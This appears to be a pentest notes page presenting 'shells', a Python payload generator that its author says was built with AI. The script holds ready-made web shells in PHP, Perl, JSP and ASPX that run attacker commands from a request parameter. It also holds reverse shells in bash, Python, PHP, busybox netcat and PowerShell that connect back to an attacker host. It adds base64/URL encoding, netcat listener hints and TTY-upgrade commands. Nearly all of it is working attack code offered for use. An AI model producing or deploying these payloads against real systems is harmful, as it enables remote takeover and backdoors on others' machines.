Shells
Built with AI
My Script:
#! /usr/bin/env python3
import argparse
import base64
import urllib.parse
import socket
import fcntl
import struct
WEB_PAYLOADS = {
"php": {"ext": "php", "code": """<?php isset($_REQUEST['cmd']) && system($_REQUEST['cmd']); ?>"""},
"perl": {"ext": "pl", "code": """#!/usr/bin/perl -w use strict; print "Content-type: text/html\\n\\n"; my $cmd = $ENV{QUERY_STRING}; system($cmd); """},
"jsp": {"ext": "jsp", "code": """<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if(cmd != null){
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while((line = r.readLine()) != null){ out.println(line); }
}
%>"""},
"aspx": {"ext": "aspx", "code": """<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(){
Process.Start("cmd.exe", "/c " + Request["cmd"]);
}
</script>"""}
}
REV_PAYLOADS = {
"bash": {"ext": "sh", "code": "bash -i >& /dev/tcp/{ip}/{port} 0>&1"},
"python3": {"ext": "py", "code": """python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("{ip}",{port}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'"""},
"python": {"ext": "py", "code": """python -c 'import socket,os,pty;s=socket.socket();s.connect(("{ip}",{port}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'"""},
"php": {"ext": "php", "code": """<?php $ip='{ip}';$port={port}; $sock=fsockopen($ip,$port); exec("/bin/sh -i <&3 >&3 2>&3"); ?>"""},
"busybox": {"ext": "sh", "code": "busybox nc {ip} {port} -e /bin/bash"},
"powershell": {"ext": "ps1", "code": """$c=New-Object System.Net.Sockets.TCPClient('{ip}',{port});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length))-ne 0){{$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1 | Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$s.Write(([text.encoding]::ASCII).GetBytes($r2),0,$r2.Length)}}"""}
}
def get_tun0_ip():
iface = b"tun0"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
data = fcntl.ioctl(
sock.fileno(),
0x8915,
struct.pack("256s", iface[:15])
)
return socket.inet_ntoa(data[20:24])
except OSError:
return None
def encode_payload(data, encoder):
if not encoder:
return data
if encoder == "base64":
return base64.b64encode(data.encode()).decode()
if encoder == "url":
return urllib.parse.quote(data)
return data
def list_payloads(db):
print("[+] Available payloads:")
for k in db:
print(f" - {k}")
def write_output(data, path):
if path:
with open(path, "w") as f:
f.write(data)
print(f"[+] Written to {path}")
else:
print(f"[+] Payload:\n {data}")
def print_listener_hint(payload_name, ip, port):
if payload_name == "powershell":
print(f"\n[*] Listener (Windows target):\n rlwrap nc {ip} {port}")
else:
print(f"\n[*] Listener (Linux/Unix target):\n nc {ip} {port}")
print("\n[*] Full TTY Python:\n python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n CTRL+Z\n stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;")
print("\n[*] Full TTY Script:\n script /dev/null -qc /bin/bash\n CTRL+Z\n stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;")
def add_custom_help(parser):
parser.add_argument(
"-h", "--help",
action="help"
)
def build_parser():
parser = argparse.ArgumentParser(
prog="shells",
description="Web/Reverse Shell Payload Generator",
add_help=False
)
add_custom_help(parser)
sub = parser.add_subparsers(dest="mode", required=True)
web = sub.add_parser(
"web",
help="Web Shell Payloads",
add_help=False
)
add_custom_help(web)
web.add_argument("-p", "--payload")
web.add_argument("-o", "--output")
web.add_argument("--list-payloads", action="store_true")
web.add_argument("--encode", choices=["base64", "url"])
rev = sub.add_parser(
"rev",
help="Reverse Shell Payloads",
add_help=False
)
add_custom_help(rev)
rev.add_argument("-p", "--payload")
rev.add_argument("-lh", "--local-host", help="Default To Tun0 IP")
rev.add_argument("-lp", "--local-port", type=int, default=443, help="Default To 443")
rev.add_argument("-o", "--output")
rev.add_argument("--list-payloads", action="store_true")
rev.add_argument("--encode", choices=["base64", "url"])
return parser
def main():
parser = build_parser()
args = parser.parse_args()
if args.mode == "web":
if args.list_payloads:
list_payloads(WEB_PAYLOADS)
return
if not args.payload or args.payload not in WEB_PAYLOADS:
web_parser = build_parser()
web_parser.parse_args(["web", "-h"])
payload = WEB_PAYLOADS[args.payload]
output = encode_payload(payload["code"], args.encode)
write_output(output, args.output)
elif args.mode == "rev":
if args.list_payloads:
list_payloads(REV_PAYLOADS)
return
if not args.payload or args.payload not in REV_PAYLOADS:
rev_parser = build_parser()
rev_parser.parse_args(["rev", "-h"])
if args.local_host:
local_host = args.local_host
else:
tun0_ip = get_tun0_ip()
if tun0_ip:
local_host = tun0_ip
else:
print("[-] Tun0 Not Found. Please specify --local-host/-lh")
return
payload = REV_PAYLOADS[args.payload]
filled = payload["code"].format(
ip=local_host,
port=args.local_port
)
output = encode_payload(filled, args.encode)
write_output(output, args.output)
print_listener_hint(args.payload, local_host, args.local_port)
if __name__ == "__main__":
main()
Dependencies:
Usage:
Help Menu:
Current Available Shells:
Generate PHP Web Shell:
Generate BASH Reverse Shell:
Generate PowerShell Reverse Shell:
Encodings:
Output the Payload to a File:
Last updated